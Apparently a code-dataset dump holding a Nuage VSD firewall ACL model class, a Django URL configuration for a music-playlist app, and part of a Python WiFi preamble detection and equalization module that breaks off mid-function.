                If enabled, a default ACL of Allow All is added as the last entry in the list of ACL entries
This attribute is named `defaultAllowIP` in VSD API.
"""
return self._default_allow_ip
@default_allow_ip.setter
def default_allow_ip(self, value):
""" Set default_allow_ip value.
Notes:
                If enabled, a default ACL of Allow All is added as the last entry in the list of ACL entries
This attribute is named `defaultAllowIP` in VSD API.
"""
self._default_allow_ip = value
@property
def default_allow_non_ip(self):
""" Get default_allow_non_ip value.
Notes:
If enabled, non ip traffic will be dropped
This attribute is named `defaultAllowNonIP` in VSD API.
"""
return self._default_allow_non_ip
@default_allow_non_ip.setter
def default_allow_non_ip(self, value):
""" Set default_allow_non_ip value.
Notes:
If enabled, non ip traffic will be dropped
This attribute is named `defaultAllowNonIP` in VSD API.
"""
self._default_allow_non_ip = value
@property
def description(self):
""" Get description value.
Notes:
A description of the entity
"""
return self._description
@description.setter
def description(self, value):
""" Set description value.
Notes:
A description of the entity
"""
self._description = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def rule_ids(self):
""" Get rule_ids value.
Notes:
Firewall rules associated with this firewall acl.
This attribute is named `ruleIds` in VSD API.
"""
return self._rule_ids
@rule_ids.setter
def rule_ids(self, value):
""" Set rule_ids value.
Notes:
Firewall rules associated with this firewall acl.
This attribute is named `ruleIds` in VSD API.
"""
self._rule_ids = value
@property
def auto_generate_priority(self):
""" Get auto_generate_priority value.
Notes:
If enabled, entries priority will be randomly generated between allowed range.
This attribute is named `autoGeneratePriority` in VSD API.
"""
return self._auto_generate_priority
@auto_generate_priority.setter
def auto_generate_priority(self, value):
""" Set auto_generate_priority value.
Notes:
If enabled, entries priority will be randomly generated between allowed range.
This attribute is named `autoGeneratePriority` in VSD API.
"""
self._auto_generate_priority = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
| 30.164
| 296
| 0.604628
|
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUFirewallRulesFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUDomainsFetcher
from bambou import NURESTObject
class NUFirewallAcl(NURESTObject):
__rest_name__ = "firewallacl"
__resource_name__ = "firewallacls"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
def __init__(self, **kwargs):
super(NUFirewallAcl, self).__init__()
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._active = None
self._default_allow_ip = None
self._default_allow_non_ip = None
self._description = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._rule_ids = None
self._auto_generate_priority = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="active", remote_name="active", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_ip", remote_name="defaultAllowIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_non_ip", remote_name="defaultAllowNonIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="rule_ids", remote_name="ruleIds", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="auto_generate_priority", remote_name="autoGeneratePriority", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.firewall_rules = NUFirewallRulesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.domains = NUDomainsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def last_updated_by(self):
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
self._last_updated_by = value
@property
def last_updated_date(self):
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
self._last_updated_date = value
@property
def active(self):
return self._active
@active.setter
def active(self, value):
self._active = value
@property
def default_allow_ip(self):
return self._default_allow_ip
@default_allow_ip.setter
def default_allow_ip(self, value):
self._default_allow_ip = value
@property
def default_allow_non_ip(self):
return self._default_allow_non_ip
@default_allow_non_ip.setter
def default_allow_non_ip(self, value):
self._default_allow_non_ip = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def embedded_metadata(self):
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
self._embedded_metadata = value
@property
def entity_scope(self):
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
self._entity_scope = value
@property
def creation_date(self):
return self._creation_date
@creation_date.setter
def creation_date(self, value):
self._creation_date = value
@property
def rule_ids(self):
return self._rule_ids
@rule_ids.setter
def rule_ids(self, value):
self._rule_ids = value
@property
def auto_generate_priority(self):
return self._auto_generate_priority
@auto_generate_priority.setter
def auto_generate_priority(self, value):
self._auto_generate_priority = value
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, value):
self._owner = value
@property
def external_id(self):
return self._external_id
@external_id.setter
def external_id(self, value):
self._external_id = value
| true
| true
|
1c493ef011476abc24d0368d37585b1c67c3570d
| 1,548
|
py
|
Python
|
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | null | null | null |
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | 8
|
2020-06-05T18:08:05.000Z
|
2022-01-13T00:44:30.000Z
|
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
# Import class-based views
from .views import UserProfileView, UpdateUserProfileView, UpdateUserPasswordView, \
UserProfileDetailView, PlaylistDetailView, PlaylistCreateView, FollowUserProfileView, \
FollowPlaylistView, PlayListListView, AddToPlaylistView
urlpatterns = [
url(r'^$', login_required(UserProfileView.as_view()), name='user_profile'),
url(r'^(?P<username>[\w-]+)/playlist/$', login_required(PlayListListView.as_view()), name='user_all_playlists'),
url(r'^password/$', login_required(UpdateUserPasswordView.as_view()), name='user_change_password'),
url(r'^update/$', login_required(UpdateUserProfileView.as_view()), name='user_update_profile'),
url(r'^create-playlist/$', login_required(PlaylistCreateView.as_view()), name='user_create_playlist'),
url(r'^(?P<username>[\w-]+)/(?P<playlist_slug>[\w-]+)/$', login_required(PlaylistDetailView.as_view()),
name='user_playlist'),
url(r'^add-song/(?P<playlist_id>[\w-]+)/(?P<song_id>[\w-]+)/$', login_required(AddToPlaylistView.as_view()),
name='add_song_playlist'),
url(r'^(?P<pk>[0-9]+)/$', login_required(UserProfileDetailView.as_view()), name='visit_user_profile'),
    url(r'^follow-user/(?P<user_id>[0-9]+)/$', login_required(FollowUserProfileView.as_view()),
        name='follow_user_profile'),
    url(r'^follow-playlist/(?P<playlist_id>[0-9]+)/$', login_required(FollowPlaylistView.as_view()),
        name='follow_playlist'),
]
| 57.333333
| 116
| 0.720284
|
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
from .views import UserProfileView, UpdateUserProfileView, UpdateUserPasswordView, \
UserProfileDetailView, PlaylistDetailView, PlaylistCreateView, FollowUserProfileView, \
FollowPlaylistView, PlayListListView, AddToPlaylistView
urlpatterns = [
url(r'^$', login_required(UserProfileView.as_view()), name='user_profile'),
url(r'^(?P<username>[\w-]+)/playlist/$', login_required(PlayListListView.as_view()), name='user_all_playlists'),
url(r'^password/$', login_required(UpdateUserPasswordView.as_view()), name='user_change_password'),
url(r'^update/$', login_required(UpdateUserProfileView.as_view()), name='user_update_profile'),
url(r'^create-playlist/$', login_required(PlaylistCreateView.as_view()), name='user_create_playlist'),
url(r'^(?P<username>[\w-]+)/(?P<playlist_slug>[\w-]+)/$', login_required(PlaylistDetailView.as_view()),
name='user_playlist'),
url(r'^add-song/(?P<playlist_id>[\w-]+)/(?P<song_id>[\w-]+)/$', login_required(AddToPlaylistView.as_view()),
name='add_song_playlist'),
url(r'^(?P<pk>[0-9]+)/$', login_required(UserProfileDetailView.as_view()), name='visit_user_profile'),
    url(r'^follow-user/(?P<user_id>[0-9]+)/$', login_required(FollowUserProfileView.as_view()),
        name='follow_user_profile'),
    url(r'^follow-playlist/(?P<playlist_id>[0-9]+)/$', login_required(FollowPlaylistView.as_view()),
        name='follow_playlist'),
]
| true
| true
|
1c49404f0513b7d760f2819862a1b1a1b9b0b8f1
| 48,784
|
py
|
Python
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 12
|
2020-03-05T12:24:37.000Z
|
2022-01-07T15:10:37.000Z
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 5
|
2020-06-29T02:17:14.000Z
|
2021-06-24T22:22:23.000Z
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 5
|
2020-11-01T17:49:46.000Z
|
2022-03-05T02:52:11.000Z
|
'''
Contains code for fractionally spaced equalization and preamble detection.
Also includes a modified version of Teledyne's data read and preprocessing code.
'''
import numpy as np
import os
import json
import csv
import math
import fractions
import resampy
from tqdm import tqdm, trange
import matplotlib
import matplotlib.pyplot as plt
from scipy.fftpack import fft, ifft, fftshift, ifftshift
import ipdb
from sklearn.preprocessing import normalize
def preprocess_wifi(data_dict, sample_duration, sample_rate, preprocess_type=1, progress=True):
'''
    Detects and extracts the preamble from each signal, then normalizes and resamples it according to preprocess_type.
'''
signal_indices = range(len(data_dict['data_file']))
if progress is True:
signal_indices = tqdm(signal_indices)
flag = 0
for i in signal_indices:
signal = data_dict['signal'][i]
orig_sample_rate = data_dict['capture_sample_rate'][i]
start_index = 0
end_index = math.ceil(sample_duration * orig_sample_rate)
        if orig_sample_rate == int(200e6):
if (preprocess_type == 2) or (preprocess_type == 3):
lowFreq = data_dict['freq_lower_edge'][i]
upFreq = data_dict['freq_upper_edge'][i]
Fc = data_dict['capture_frequency'][i]
signal, flag_i = detect_frame(signal, lowFreq, upFreq, Fc, verbose=False)
flag = flag + flag_i
if preprocess_type == 3:
signal = frac_eq_preamble(signal)
        start_index = int(start_index)
        end_index = int(end_index)
        if (preprocess_type == 1) or (preprocess_type == 2) or (orig_sample_rate != int(200e6)):
signal = signal[start_index:end_index] # extract needed section of signal
with np.errstate(all='raise'):
try:
signal = signal / rms(signal) # normalize signal
except FloatingPointError:
# print('data_file = '+str(data_dict['data_file'][i]) + ',\t reference_number = '+str(data_dict['reference_number'][i]))
try:
# print('Normalization error. RMS = {}, Max = {}, Min = {}, Data size = {}'.format(rms(signal), np.abs(signal).min(), np.abs(signal).max(), signal.shape))
signal += 1.0/np.sqrt(2*signal.size) + 1.0/np.sqrt(2*signal.size)*1j
except FloatingPointError:
# print('i = {}, signal.shape = {}'.format(i, signal.shape))
# print('start_index = {}, end_index = {}'.format(start_index, end_index))
signal_size = end_index - start_index
signal = np.ones([signal_size]) * (1.0 + 1.0*1j)/np.sqrt(2*signal_size)
        if (preprocess_type == 1) or (orig_sample_rate != int(200e6)):
freq_shift = (data_dict['freq_upper_edge'][i] +
data_dict['freq_lower_edge'][i])/2 - data_dict['capture_frequency'][i]
# baseband signal w.r.t. center frequency
signal = shift_frequency(signal, freq_shift, orig_sample_rate)
# filter and downsample signal
signal = resample(signal, orig_sample_rate, sample_rate)
if (preprocess_type == 2):
signal = resample(signal, orig_sample_rate, sample_rate)
data_dict['signal'][i] = signal
# data_dict['freq_lower_edge'][i] = -sample_rate/2.
# data_dict['freq_upper_edge'][i] = sample_rate/2.
# data_dict['sample_start'][i] = 0
# data_dict['sample_count'][i] = len(signal)
data_dict['center_frequency'][i] = (
data_dict['freq_upper_edge'][i] + data_dict['freq_lower_edge'][i])/2.
data_dict['sample_rate'][i] = sample_rate
if (preprocess_type == 2) or (preprocess_type == 3):
print('Successful frame detection on {:.2f}% of signals'.format(
100.0-flag*100.0/len(data_dict['data_file'])))
return data_dict
def frac_eq_preamble(rx, verbose=False):
'''
Fractionally equalize preamble
https://ieeexplore.ieee.org/document/489269
'''
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
stf_64 = ifft(ifftshift(Stf_64))
# stf = stf_64[:16]
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
ltf = ifft(ifftshift(Ltf))
tx = np.concatenate((stf_64[:-32], stf_64, stf_64, ltf[-32:], ltf, ltf))
L = 160
N = 320
rx = rx.reshape([-1, 1])
R = np.zeros([L, L]) + 0j
p = np.zeros([L, 1]) + 0j
for i in range(N):
j = 10*i
R += rx[j:j+L].dot(rx[j:j+L].conj().T)
p += rx[j:j+L] * tx[i].conj()
    c, residuals, rank, sing = np.linalg.lstsq(R, p, rcond=None)
# h = c[::-1].conj()
# rx_eq = np.convolve(h, rx, mode='full')[np.int(L/2):-np.int(L/2)]
# signal_eq = rx_eq[::10][:1600]
signal_eq = np.zeros([N, 1]) + 0j
for i in range(N):
j = 10*i
signal_eq[i] = rx[j:j+L].T.dot(c.conj())
return signal_eq.flatten()
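# --- Editor's note (illustrative, not part of the original file) ---
# frac_eq_preamble solves the least-squares normal equations R c = p, where R
# accumulates outer products of length-L windows of the 10x-oversampled rx and
# p cross-correlates those windows with the known ideal preamble tx; the
# solution c is then applied as a fractionally spaced (T/10) correlator, one
# inner product per symbol-rate output sample.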
def detect_frame(complex_signal, lowFreq, upFreq, Fc, verbose=False):
'''
    Filters out-of-band noise, then detects the start of the frame via STF autocorrelation and returns the signal from that point on, plus a failure flag.
'''
Fs = 200e6
flag = 0
# ----------------------------------------------------
# Filter out-of-band noise
# ----------------------------------------------------
N = complex_signal.shape[0]
if N % 2 != 0:
complex_signal = complex_signal[:-1]
N -= 1
    low_ind = int((lowFreq-Fc)*(N/Fs) + N/2)
    up_ind = int((upFreq-Fc)*(N/Fs) + N/2)
    lag = int((-Fc + (lowFreq+upFreq)/2)*(N/Fs) + N/2) - int(N/2)
X = fftshift(fft(complex_signal))
X[:low_ind] = 0 + 0j
X[up_ind:] = 0 + 0j
X = np.roll(X, -lag)
complex_signal = ifft(ifftshift(X))
# ----------------------------------------------------
# Coarse frame detection (using STF)
# ----------------------------------------------------
    guard_band_upsamp = int(2e-6*Fs)  # 2 usec
    n_win = 1600 - 160  # correlation window: STF length minus one lag
lag = 160
    search_length_stf_upsamp = min(2*guard_band_upsamp+1, complex_signal.size)
autocorr_stf_upsamp = np.zeros(search_length_stf_upsamp)
a = np.zeros(search_length_stf_upsamp)+0j
p = np.zeros(search_length_stf_upsamp)
for n in range(search_length_stf_upsamp):
sig1 = complex_signal[n:n+n_win].reshape(1, -1)
sig2 = complex_signal[n+lag:n+n_win+lag].conj().reshape(1, -1)
a[n] = sig1.dot(sig2.T)
# p[n] = np.sum(np.abs(sig1)**2)
p[n] = np.sqrt(np.sum(np.abs(sig1)**2)*np.sum(np.abs(sig2)**2))
autocorr_stf_upsamp = np.abs(a)/p
frame_start_autocorr_upsamp = np.argmax(autocorr_stf_upsamp)
# ----------------------------------------------------
# Guard band sanity check
# ----------------------------------------------------
n_short_upsamp = 1600
if frame_start_autocorr_upsamp <= 2*guard_band_upsamp:
# sig3 = complex_signal[frame_start_autocorr_upsamp+np.int(n_short_upsamp/2):frame_start_autocorr_upsamp+n_short_upsamp-160].conj().copy()
# sig4 = complex_signal[frame_start_autocorr_upsamp+np.int(n_short_upsamp/2)+160:frame_start_autocorr_upsamp+n_short_upsamp].copy()
# df1_upsamp = 1/160 * np.angle(sig3.dot(sig4.T))
# complex_signal[frame_start_autocorr_upsamp:] *= np.exp(-1j*np.arange(0,complex_signal.size - frame_start_autocorr_upsamp)*df1_upsamp).flatten()
if verbose == True:
print('Autocorr prediction = {}'.format(frame_start_autocorr_upsamp))
# print('Freq offset_upsamp = {:.2f} KHz'.format(df1_upsamp* 2e8 / (2*np.pi*1e3)))
else:
if verbose == True:
print('Autocorr detection failed\n Prediction = {}'.format(frame_start_autocorr_upsamp))
frame_start_autocorr_upsamp = guard_band_upsamp
# df1_upsamp = 0
flag = 1
return complex_signal[frame_start_autocorr_upsamp:], flag
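# --- Editor's illustrative sketch (not part of the original file) ---
# The detection metric above is a normalized lag-160 autocorrelation that peaks
# where the periodic STF begins. A minimal synthetic check (the noise floor and
# the 10x-repeated random sequence standing in for the STF are made up):
def _demo_stf_autocorr():
    rng = np.random.RandomState(0)
    seq = rng.randn(160) + 1j * rng.randn(160)
    noise = lambda n: 0.05 * (rng.randn(n) + 1j * rng.randn(n))
    sig = np.concatenate([noise(500), np.tile(seq, 10), noise(500)])
    lag, n_win = 160, 1600 - 160
    metric = np.zeros(600)
    for n in range(600):
        s1 = sig[n:n + n_win]
        s2 = sig[n + lag:n + lag + n_win].conj()
        metric[n] = np.abs(s1.dot(s2)) / np.sqrt(
            np.sum(np.abs(s1) ** 2) * np.sum(np.abs(s2) ** 2))
    return int(np.argmax(metric))  # close to 500, where the periodic part starts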
def offset_compensate_preamble(preamble_in, fs=200e6, verbose=False, option=1):
"""
Function that strips out the effect of the offset from the preamble.
df = 1/16 arg(sum_{n=0}^{N_short - 1 - 16} s[n]* s'[n+16] )
s[n] <---- s[n]* e^(j.n.df)
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(320 samples)
fs - Sampling frequency
[Verbose] - Verbose
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600 # Length of short preamble
n_long = 1600 # Length of long preamble
L = 160 # length of single short sequence
        N = 640  # length of single long sequence
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# Coarse estimation
# sig3 = preamble[n_short//2: n_short-L].conj().copy()
# sig4 = preamble[n_short//2 + L: n_short].copy()
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160 # Length of short preamble
n_long = 160 # Length of long preamble
L = 16 # length of single short sequence
N = 64 # length of single long sequence
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# Coarse estimation
        sig3 = preamble[n_short//2:n_short-L].conj().copy()
        sig4 = preamble[n_short//2+L:n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short+32:n_short+32+N].conj().copy()
sig6 = preamble[n_short+N+32:n_short+n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
if option == 1:
return preamble
elif option == 2:
return preamble, freq_offset
else:
raise NotImplementedError
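# --- Editor's illustrative sketch (not part of the original file) ---
# Sanity check of the lag-based CFO estimator used above, on a synthetic
# periodic sequence with a known, made-up offset of 0.01 rad/sample:
def _demo_cfo_estimate():
    L = 16
    rng = np.random.RandomState(1)
    base = rng.randn(L) + 1j * rng.randn(L)
    s = np.tile(base, 10)  # periodic "STF": 160 samples, period L
    df_true = 0.01  # rad/sample; must satisfy |df_true * L| < pi
    s = s * np.exp(1j * df_true * np.arange(s.size))
    # lag-L autocorrelation angle recovers the offset: arg(sum s*[n] s[n+L]) = L*df
    df_hat = (1. / L) * np.angle(s[:-L].conj().dot(s[L:]))
    return df_hat  # approximately 0.01 (exact here, since there is no noise)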
def get_residuals_preamble(preamble_in, fs, method='subtraction', channel_method='frequency', verbose=False, label=''):
"""
Function that reconstructs the preamble fed into this function with the channel and CFO effects
and returns the difference between original preamble and reconstructed one (residuals):
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(3200 samples)
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
preamble_orig = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
cfo_total = np.multiply(np.exp(1j*np.arange(0, preamble.size)*df1).flatten(),
np.exp(1j*np.arange(0, preamble.size)*df2).flatten())
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
        Ltf1_rx = fftshift(
            fft(preamble[n_short+int(n_long/5):n_short+int(n_long/5 + n_long*2/5)]))
        Ltf2_rx = fftshift(fft(preamble[n_short+int(n_long/5 + n_long*2/5):n_short+n_long]))
        Ltf_mid_rx = fftshift(
            fft(preamble[n_short + 2*L - int(L/2):n_short + 2*L+N - int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
# ipdb.set_trace()
Ltf_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Ltf, np.zeros(32*9) + 1j * np.zeros(32*9)))
        H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf  # valid since Ltf is +/-1 on occupied bins, so multiplying equals dividing
h_hat = np.roll(ifft(ifftshift(H_hat)), -N//2)
# H_1_hat[ind_all] = Ltf_1_rx[ind_all]*Ltf
# H_2_hat[ind_all] = Ltf_2_rx[ind_all]*Ltf
# H_hat[ind_all] = Ltf/Ltf_avg_rx[ind_all]
# ltf_1_interpolated = ifft(ifftshift(H_1_hat*Ltf_interpolated))
# ltf_2_interpolated = ifft(ifftshift(H_2_hat*Ltf_interpolated))
# ltf_total = np.concatenate((ltf_1_interpolated[-N//2:], ltf_1_interpolated, ltf_2_interpolated))
# ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
if channel_method == 'time':
ltf_interpolated = ifft(ifftshift(Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * (np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[
N//2-1:-N//2])/rms(np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[N//2-1:-N//2])
elif channel_method == 'frequency':
ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(H_hat * Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * np.concatenate((stf_total, ltf_total))
# stf_ch_cfo = ifft(ifftshift(fftshift(fft(preamble_constructed[N//2:N+N//2]))*H_hat))
# ltf_ch_cfo = ifft(ifftshift(fftshift(fft(preamble_constructed[n_short+N//2:n_short+N//2+N]))*H_hat))
# stf_total_cfo_ch_added = np.concatenate((stf_ch_cfo[-N//2:], stf_ch_cfo, stf_ch_cfo))
# ltf_total_cfo_ch_added = np.concatenate((ltf_ch_cfo[-N//2:], ltf_ch_cfo, ltf_ch_cfo))
# preamble_constructed = np.concatenate((stf_total_cfo_ch_added, ltf_total_cfo_ch_added))
if method == 'division':
residuals = preamble_orig/(preamble_constructed+0.001)
elif method == 'subtraction':
residuals = preamble_orig - preamble_constructed
